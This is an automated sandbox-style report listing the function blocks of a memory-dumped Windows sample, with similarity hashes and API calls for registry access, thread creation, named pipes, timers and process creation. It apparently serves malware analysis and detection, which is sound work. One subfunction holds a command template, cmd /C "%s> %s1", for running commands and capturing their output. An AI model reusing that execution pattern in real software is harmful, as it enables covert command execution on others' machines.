    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 35
  • API ID: FlushFileBuffersGetLastErrormemset
  • String ID: K$P
  • API String ID: 1157411244-420285281
  • Opcode ID: b776852dc2126f9b1b4d2b6506190c96010406ec9a84ebb4623d6614876d6961
  • Instruction ID: 690a8b8b9a9b9257472a4c9e9031e2b6228afbf5fdb6d6ed7caf7786d6f424c8
  • Opcode Fuzzy Hash: 8CF07B5009DB0086D877E4020147FC67EA2B782DC5C94B7E134D1B2F5F2E10914AD758
  • Instruction Fuzzy Hash: 690a8b8b9a9b9257472a4c9e9031e2b6228afbf5fdb6d6ed7caf7786d6f424c8
APIs
  • memset.NTDLL ref: 001D6A41
  • FlushFileBuffers.KERNEL32(00000000), ref: 001D6AA8
  • GetLastError.KERNEL32(?,00000000,00000000), ref: 001D6AB2
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 4
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID: W
  • API String ID: 168078221-655174618
  • Opcode ID: b9da9fa840bf6074c408ec4bac05ea25fd3e186289c4e2afa14c93c02e877af3
  • Instruction ID: da849983bae2cba88ba3f639a5f23240e47ef508a0620d7c4692c40c99cf5b5e
  • Opcode Fuzzy Hash: 70F049740108C689C00738799034776A140BFB12E5C8D7B31EA1A7968E7F62759A6B19
  • Instruction Fuzzy Hash: da849983bae2cba88ba3f639a5f23240e47ef508a0620d7c4692c40c99cf5b5e
APIs
  • lstrlen.KERNEL32(00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000,00000000,00000001,?,?,001CD506,00000000), ref: 001C2752
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001C2765
  • lstrcpy.KERNEL32(00000004,00000000), ref: 001C2783
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,001EC202), ref: 001C27A9
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
